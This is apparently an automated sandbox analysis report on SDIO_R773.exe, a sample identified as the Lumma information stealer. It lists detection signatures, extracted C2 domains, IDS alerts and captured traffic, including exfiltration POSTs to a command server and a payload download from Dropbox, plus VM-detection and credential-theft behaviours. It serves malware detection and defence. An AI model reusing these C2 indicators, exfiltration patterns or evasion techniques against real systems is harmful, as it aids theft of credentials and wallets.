Windows Analysis Report
SDIO_R773.exe

Overview

General Information

Sample name: SDIO_R773.exe
Analysis ID: 1589146
MD5: c45a36ec4b4f8d8412c60db459c2b9d2
SHA1: 5c67453947128df910b46d5356f2ac5a8bae0cc9
SHA256: 24a26ac9cd209bf84831dae7d778fceb46b1e30b48454c130a6e62accdc1369e
Tags: exe, user-SquiblydooBlog

Detection

LummaC
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Creates HTML files with .exe extension (expired dropper behavior)
Found many strings related to Crypto-Wallets (likely being stolen)
LummaC encrypted strings found
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Detected potential crypto function
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May infect USB drives
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • SDIO_R773.exe (PID: 7528 cmdline: "C:\Users\user\Desktop\SDIO_R773.exe" MD5: C45A36EC4B4F8D8412C60DB459C2B9D2)
  • cleanup
Name: Lumma Stealer, LummaC2 Stealer
Description: Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["truculengisau.biz", "nuttyshopr.biz", "spookycappy.biz", "fraggielek.biz", "punishzement.biz", "marketlumpe.biz", "littlenotii.biz", "grandiouseziu.biz"], "Build id": "BbL7Kk--02"}
Source | Rule | Description | Author | Strings
sslproxydump.pcap | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security |
sslproxydump.pcap | JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security |
00000000.00000003.1985877415.0000000000D74000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000000.00000002.2064388158.0000000000C10000.00000040.00001000.00020000.00000000.sdmp | Windows_Trojan_Donutloader_f40e3759 | unknown | unknown | 0x50e20:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49; 0x543b6:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
Process Memory Space: SDIO_R773.exe PID: 7528 | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security |
Process Memory Space: SDIO_R773.exe PID: 7528 | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
Process Memory Space: SDIO_R773.exe PID: 7528 | JoeSecurity_LummaCStealer | Yara detected LummaC Stealer | Joe Security |

No Sigma rule has matched
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-11T11:56:11.578646+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49733 | 104.102.49.254 | 443 | TCP
2025-01-11T11:56:12.691095+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49734 | 104.21.64.1 | 443 | TCP
2025-01-11T11:56:13.296659+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49735 | 104.21.64.1 | 443 | TCP
2025-01-11T11:56:14.845942+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49736 | 104.21.64.1 | 443 | TCP
2025-01-11T11:56:27.599440+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49743 | 104.21.64.1 | 443 | TCP
2025-01-11T11:56:28.731351+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49744 | 104.21.64.1 | 443 | TCP
2025-01-11T11:56:30.316746+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49745 | 104.21.64.1 | 443 | TCP
2025-01-11T11:56:31.630210+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49746 | 104.21.64.1 | 443 | TCP
2025-01-11T11:56:34.056316+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49747 | 104.21.64.1 | 443 | TCP
2025-01-11T11:56:35.218542+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49748 | 162.125.66.18 | 443 | TCP
2025-01-11T11:56:36.746076+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49749 | 162.125.66.15 | 443 | TCP
2025-01-11T11:56:12.815363+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.4 | 49734 | 104.21.64.1 | 443 | TCP
2025-01-11T11:56:13.795382+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.4 | 49735 | 104.21.64.1 | 443 | TCP
2025-01-11T11:56:34.507897+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.4 | 49747 | 104.21.64.1 | 443 | TCP
2025-01-11T11:56:12.815363+0100 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.4 | 49734 | 104.21.64.1 | 443 | TCP
2025-01-11T11:56:13.795382+0100 | 2049812 | 1 | A Network Trojan was detected | 192.168.2.4 | 49735 | 104.21.64.1 | 443 | TCP
2025-01-11T11:56:28.095111+0100 | 2048094 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49743 | 104.21.64.1 | 443 | TCP
2025-01-11T11:56:31.687606+0100 | 2843864 | 1 | A Network Trojan was detected | 192.168.2.4 | 49746 | 104.21.64.1 | 443 | TCP
2025-01-11T11:56:12.096510+0100 | 2858666 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 49733 | 104.102.49.254 | 443 | TCP

              AV Detection

Source: nuttyshopr.biz | Avira URL Cloud: Label: malware
Source: spookycappy.biz | Avira URL Cloud: Label: malware
Source: https://sputnik-1985.com/apiQ | Avira URL Cloud: Label: malware
Source: https://sputnik-1985.com:443/api | Avira URL Cloud: Label: malware
Source: https://sputnik-1985.com/apiW | Avira URL Cloud: Label: malware
Source: fraggielek.biz | Avira URL Cloud: Label: malware
Source: littlenotii.biz | Avira URL Cloud: Label: malware
Source: https://sputnik-1985.com/apii | Avira URL Cloud: Label: malware
Source: SDIO_R773.exe.7528.0.memstrmin | Malware Configuration Extractor: LummaC {"C2 url": ["truculengisau.biz", "nuttyshopr.biz", "spookycappy.biz", "fraggielek.biz", "punishzement.biz", "marketlumpe.biz", "littlenotii.biz", "grandiouseziu.biz"], "Build id": "BbL7Kk--02"}
Source: Submited Sample | Integrated Neural Analysis Model: Matched 93.2% probability
Source: SDIO_R773.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: SDIO_R773.exe | Static PE information: certificate valid
Source: unknown | HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.4:49735 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.4:49743 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.4:49744 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.4:49745 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.4:49746 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.4:49747 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 162.125.66.18:443 -> 192.168.2.4:49748 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 162.125.66.15:443 -> 192.168.2.4:49749 version: TLS 1.2
              Source: SDIO_R773.exe, 00000000.00000002.2063536939.0000000000739000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: NOTE: cannot open autorun.inf [error: %d]
              Source: SDIO_R773.exe, 00000000.00000002.2063536939.0000000000739000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: DEVMGR_SHOW_NONPRESENT_DEVICES\autorun.inf[NOT_A_VIRUS]openNOTE: cannot open autorun.inf [error: %d]
              Source: SDIO_R773.exe, 00000000.00000002.2063536939.0000000000739000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: autorun.inf
              Source: SDIO_R773.exe, 00000000.00000002.2063536939.0000000000739000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: basic_string::_M_construct null not valid_LAN__WLAN-WiFi__WWAN-4G_indexes\SDIO/c del %ws\_*.bincmdautorun.inf.bat%s\%Sdriverstools\SDIOindexes\SDIO\_wgetcwd errorSrc: %d %S
              Source: SDIO_R773.exe, 00000000.00000002.2063536939.0000000000739000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: -expertmode -checkupdates -nosnapshot -nologfile -showconsole -showdrpnames1 -showdrpnames2 sdio.cfg\autorun.inf[autorun]
              Source: SDIO_R773.exe, 00000000.00000002.2063536939.0000000000739000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: autorun.infSDIO_auto.bat MB KBSelect Additional Path
              Source: SDIO_R773.exe, 00000000.00000003.1794927387.0000000003675000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: NOTE: cannot open autorun.inf [error: %d]
              Source: SDIO_R773.exe, 00000000.00000003.1794927387.0000000003675000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: DEVMGR_SHOW_NONPRESENT_DEVICES\autorun.inf[NOT_A_VIRUS]openNOTE: cannot open autorun.inf [error: %d]
              Source: SDIO_R773.exe, 00000000.00000003.1794927387.0000000003675000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: autorun.inf
              Source: SDIO_R773.exe, 00000000.00000003.1794927387.0000000003675000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: basic_string::_M_construct null not valid_LAN__WLAN-WiFi__WWAN-4G_indexes\SDIO/c del %ws\_*.bincmdautorun.inf.bat%s\%Sdriverstools\SDIOindexes\SDIO\_wgetcwd errorSrc: %d %S
              Source: SDIO_R773.exe, 00000000.00000003.1794927387.0000000003675000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: -expertmode -checkupdates -nosnapshot -nologfile -showconsole -showdrpnames1 -showdrpnames2 sdio.cfg\autorun.inf[autorun]
              Source: SDIO_R773.exe, 00000000.00000003.1794927387.0000000003675000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: autorun.infSDIO_auto.bat MB KBSelect Additional Path
              Source: SDIO_R773.exe, 00000000.00000003.1794927387.0000000003675000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Include autorun.inf and SDIO_auto.bat
              Source: SDIO_R773.exe, 00000000.00000003.1794927387.0000000003675000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: STR_VIRUS_AUTORUN = "There is an AUTORUN.INF file in the root folder"
              Source: SDIO_R773.exe, 00000000.00000003.1794927387.0000000003675000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: STR_VIRUS_AUTORUN_H = "There is an AUTORUN.INF file which can be used by malicious software to infect your PC. It's advised to check it for viruses or inspect the file to make sure it can be trusted.\n\nIf you're sure it's clean, add [NOT_A_VIRUS] inside to hide this warning."
              Source: SDIO_R773.exe, 00000000.00000003.1794927387.0000000003675000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: STR_USBWIZ_PAGE4_INCAUTO = "Include autorun.inf and SDIO_auto.bat"
              Source: SDIO_R773.exe, 00000000.00000002.2064219074.0000000000875000.00000008.00000001.01000000.00000003.sdmpBinary or memory string: Include autorun.inf and SDIO_auto.bat
              Source: SDIO_R773.exe, 00000000.00000002.2064219074.0000000000875000.00000008.00000001.01000000.00000003.sdmpBinary or memory string: STR_VIRUS_AUTORUN = "There is an AUTORUN.INF file in the root folder"
              Source: SDIO_R773.exe, 00000000.00000002.2064219074.0000000000875000.00000008.00000001.01000000.00000003.sdmpBinary or memory string: STR_VIRUS_AUTORUN_H = "There is an AUTORUN.INF file which can be used by malicious software to infect your PC. It's advised to check it for viruses or inspect the file to make sure it can be trusted.\n\nIf you're sure it's clean, add [NOT_A_VIRUS] inside to hide this warning."
              Source: SDIO_R773.exe, 00000000.00000002.2064219074.0000000000875000.00000008.00000001.01000000.00000003.sdmpBinary or memory string: STR_USBWIZ_PAGE4_INCAUTO = "Include autorun.inf and SDIO_auto.bat"
              Source: SDIO_R773.exeBinary or memory string: NOTE: cannot open autorun.inf [error: %d]
              Source: SDIO_R773.exeBinary or memory string: DEVMGR_SHOW_NONPRESENT_DEVICES\autorun.inf[NOT_A_VIRUS]openNOTE: cannot open autorun.inf [error: %d]
              Source: SDIO_R773.exeBinary or memory string: autorun.inf
              Source: SDIO_R773.exeBinary or memory string: basic_string::_M_construct null not valid_LAN__WLAN-WiFi__WWAN-4G_indexes\SDIO/c del %ws\_*.bincmdautorun.inf.bat%s\%Sdriverstools\SDIOindexes\SDIO\_wgetcwd errorSrc: %d %S
              Source: SDIO_R773.exeBinary or memory string: -expertmode -checkupdates -nosnapshot -nologfile -showconsole -showdrpnames1 -showdrpnames2 sdio.cfg\autorun.inf[autorun]
              Source: SDIO_R773.exeBinary or memory string: autorun.infSDIO_auto.bat MB KBSelect Additional Path
              Source: SDIO_R773.exeBinary or memory string: Include autorun.inf and SDIO_auto.bat
              Source: SDIO_R773.exeBinary or memory string: STR_VIRUS_AUTORUN = "There is an AUTORUN.INF file in the root folder"
              Source: SDIO_R773.exeBinary or memory string: STR_VIRUS_AUTORUN_H = "There is an AUTORUN.INF file which can be used by malicious software to infect your PC. It's advised to check it for viruses or inspect the file to make sure it can be trusted.\n\nIf you're sure it's clean, add [NOT_A_VIRUS] inside to hide this warning."
              Source: SDIO_R773.exeBinary or memory string: STR_USBWIZ_PAGE4_INCAUTO = "Include autorun.inf and SDIO_auto.bat"

              Networking

Source: Network traffic | Suricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.4:49733 -> 104.102.49.254:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49747 -> 104.21.64.1:443
Source: Network traffic | Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49734 -> 104.21.64.1:443
Source: Network traffic | Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49735 -> 104.21.64.1:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49735 -> 104.21.64.1:443
Source: Network traffic | Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49743 -> 104.21.64.1:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49734 -> 104.21.64.1:443
Source: Network traffic | Suricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.4:49746 -> 104.21.64.1:443
              Source: Malware configuration extractorURLs: truculengisau.biz
              Source: Malware configuration extractorURLs: nuttyshopr.biz
              Source: Malware configuration extractorURLs: spookycappy.biz
              Source: Malware configuration extractorURLs: fraggielek.biz
              Source: Malware configuration extractorURLs: punishzement.biz
              Source: Malware configuration extractorURLs: marketlumpe.biz
              Source: Malware configuration extractorURLs: littlenotii.biz
              Source: Malware configuration extractorURLs: grandiouseziu.biz
              Source: C:\Users\user\Desktop\SDIO_R773.exeFile created: NOUBJXTSUL2YOW34.exe.0.dr
              Source: Joe Sandbox ViewIP Address: 162.125.66.18 162.125.66.18
              Source: Joe Sandbox ViewIP Address: 104.102.49.254 104.102.49.254
              Source: Joe Sandbox ViewIP Address: 104.21.64.1 104.21.64.1
Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49733 -> 104.102.49.254:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49744 -> 104.21.64.1:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49736 -> 104.21.64.1:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49743 -> 104.21.64.1:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49735 -> 104.21.64.1:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49749 -> 162.125.66.15:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49734 -> 104.21.64.1:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49747 -> 104.21.64.1:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49746 -> 104.21.64.1:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49745 -> 104.21.64.1:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49748 -> 162.125.66.18:443
              Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: sputnik-1985.com
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedCookie: __cf_mw_byp=.3qNnW7B5PvVpXQQ4.UjY.DbaYunewo_Wyf0Mx12mTc-1736592972-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 44Host: sputnik-1985.com
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=K8TVJ8YTUGNJCookie: __cf_mw_byp=.3qNnW7B5PvVpXQQ4.UjY.DbaYunewo_Wyf0Mx12mTc-1736592972-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18124Host: sputnik-1985.com
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=TWFBAMJXUCookie: __cf_mw_byp=.3qNnW7B5PvVpXQQ4.UjY.DbaYunewo_Wyf0Mx12mTc-1736592972-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8727Host: sputnik-1985.com
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=IL6BMMWY71KX89XERCookie: __cf_mw_byp=.3qNnW7B5PvVpXQQ4.UjY.DbaYunewo_Wyf0Mx12mTc-1736592972-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20428Host: sputnik-1985.com
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=5NLKGQ3BJ2AK5Cookie: __cf_mw_byp=.3qNnW7B5PvVpXQQ4.UjY.DbaYunewo_Wyf0Mx12mTc-1736592972-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1234Host: sputnik-1985.com
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=53G1TXEPG3U24Cookie: __cf_mw_byp=.3qNnW7B5PvVpXQQ4.UjY.DbaYunewo_Wyf0Mx12mTc-1736592972-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 589917Host: sputnik-1985.com
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedCookie: __cf_mw_byp=.3qNnW7B5PvVpXQQ4.UjY.DbaYunewo_Wyf0Mx12mTc-1736592972-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 79Host: sputnik-1985.com
              Source: global trafficHTTP traffic detected: GET /scl/fi/tzw461qf44namwoprtqi1/channels424_banner.jpg?rlkey=ggwr95slh92f24jnfjirjyzys&st=8tyyz5o7&dl=1 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: www.dropbox.com
              Source: global trafficHTTP traffic detected: GET /cd/0/get/Ch9Eke8i0BLC3-DtINknVGtnjncus_u99HdagMMMzqS1C8VzqEY5PQ_JhjusgWHY1s4INYrDYXnP6n3C2obINdgOZAzOWbQcf4GGcylpLcMkiO54nwiWjM6mWgFeR2Srg4dg3ZC_YHliUlRXW1veRWN7/file?dl=1# HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: uca3ce58b2740dd4c68b9a7532f7.dl.dropboxusercontent.com
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
'unsafe-eval' ; media-src https://* blob: ; report-uri https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist ; connect-src https://* ws://127.0.0.1:*/ws blob: wss://dsimports.dropbox.com/ ; frame-src https://* carousel: dbapi-6: dbapi-7: dbapi-8: dropbox-client: itms-apps: itms-appss: ; font-src https://* data: ; img-src https://* data: blob: ; default-src https://www.dropbox.com/playlist/ https://www.dropbox.com/v/s/playlist/ https://*.dropboxusercontent.com/p/hls_master_playlist/ https://*.dropboxusercontent.com/p/hls_playlist/ ; child-src https://www.dropbox.com/static/serviceworker/ blob: ; object-src 'self' https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ ; script-src 'unsafe-eval' 'inline-speculation-rules' https://www.dropbox.com/static/api/ https://www.dropbox.com/pithos/* https://www.dropbox.com/page_success/ https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ https://accounts.google.com/gsi/client https://canny.io/sdk.js https://www.paypal.com/sdk/js 'nonce-SIs+rPrP3KYvK5g0EjVvZjT67gE=' ; worker-src https://www.dropbox.com/static/serviceworker/ https://www.dropbox.com/en
              Source: SDIO_R773.exe, 00000000.00000003.2060608569.000000000488D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: form-action https://docs.google.com/document/fsip/ https://docs.google.com/spreadsheets/fsip/ https://docs.google.com/presentation/fsip/ https://docs.sandbox.google.com/document/fsip/ https://docs.sandbox.google.com/spreadsheets/fsip/ https://docs.sandbox.google.com/presentation/fsip/ https://*.purple.officeapps.live-int.com https://officeapps-df.live.com https://*.officeapps-df.live.com https://officeapps.live.com https://*.officeapps.live.com https://paper.dropbox.com/cloud-docs/edit 'self' https://www.dropbox.com/ https://dl-web.dropbox.com/ https://photos.dropbox.com/ https://paper.dropbox.com/ https://showcase.dropbox.com/ https://www.hellofax.com/ https://app.hellofax.com/ https://www.hellosign.com/ https://app.hellosign.com/ https://docsend.com/ https://www.docsend.com/ https://help.dropbox.com/ https://navi.dropbox.jp/ https://a.sprig.com/ https://selfguidedlearning.dropboxbusiness.com/ https://instructorledlearning.dropboxbusiness.com/ https://sales.dropboxbusiness.com/ https://accounts.google.com/ https://api.login.yahoo.com/ https://login.yahoo.com/ https://experience.dropbox.com/ https://pal-test.adyen.com https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/ https://onedrive.live.com/picker ; frame-ancestors 'self' https://*.dropbox.com ; base-uri 'self' ; style-src https://* 'unsafe-inline' 'unsafe-eval' ; media-src https://* blob: ; report-uri https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist ; connect-src https://* ws://127.0.0.1:*/ws blob: wss://dsimports.dropbox.com/ ; frame-src https://* carousel: dbapi-6: dbapi-7: dbapi-8: dropbox-client: itms-apps: itms-appss: ; font-src https://* data: ; img-src https://* data: blob: ; default-src https://www.dropbox.com/playlist/ https://www.dropbox.com/v/s/playlist/ https://*.dropboxusercontent.com/p/hls_master_playlist/ 
https://*.dropboxusercontent.com/p/hls_playlist/ ; child-src https://www.dropbox.com/static/serviceworker/ blob: ; object-src 'self' https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ ; script-src 'unsafe-eval' 'inline-speculation-rules' https://www.dropbox.com/static/api/ https://www.dropbox.com/pithos/* https://www.dropbox.com/page_success/ https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ https://accounts.google.com/gsi/client https://canny.io/sdk.js https://www.paypal.com/sdk/js 'nonce-SIs+rPrP3KYvK5g0EjVvZjT67gE=' ; worker-src https://www.dropbox.com/static/serviceworker/ https://www.dropbox.com/encrypted_folder_download/service_worker.js https://www.dropbox.com/service_worker.js blob: equals www.yahoo.com (Yahoo)
              Source: SDIO_R773.exe, 00000000.00000003.1816198825.0000000000D25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: om/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://playX equals www.youtube.com (Youtube)
              Source: SDIO_R773.exe, 00000000.00000003.1816198825.0000000000D25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: s://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-sr equals www.youtube.com (Youtube)
              Source: SDIO_R773.exe, 00000000.00000002.2066797770.0000000000D06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ww.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com equals www.youtube.com (Youtube)
              Source: global traffic | DNS traffic detected: DNS query: punishzement.biz
              Source: global traffic | DNS traffic detected: DNS query: fraggielek.biz
              Source: global traffic | DNS traffic detected: DNS query: grandiouseziu.biz
              Source: global traffic | DNS traffic detected: DNS query: littlenotii.biz
              Source: global traffic | DNS traffic detected: DNS query: marketlumpe.biz
              Source: global traffic | DNS traffic detected: DNS query: nuttyshopr.biz
              Source: global traffic | DNS traffic detected: DNS query: spookycappy.biz
              Source: global traffic | DNS traffic detected: DNS query: truculengisau.biz
              Source: global traffic | DNS traffic detected: DNS query: steamcommunity.com
              Source: global traffic | DNS traffic detected: DNS query: sputnik-1985.com
              Source: global traffic | DNS traffic detected: DNS query: www.dropbox.com
              Source: global traffic | DNS traffic detected: DNS query: uca3ce58b2740dd4c68b9a7532f7.dl.dropboxusercontent.com
              Source: unknown | HTTP traffic detected:
                  POST /api HTTP/1.1
                  Connection: Keep-Alive
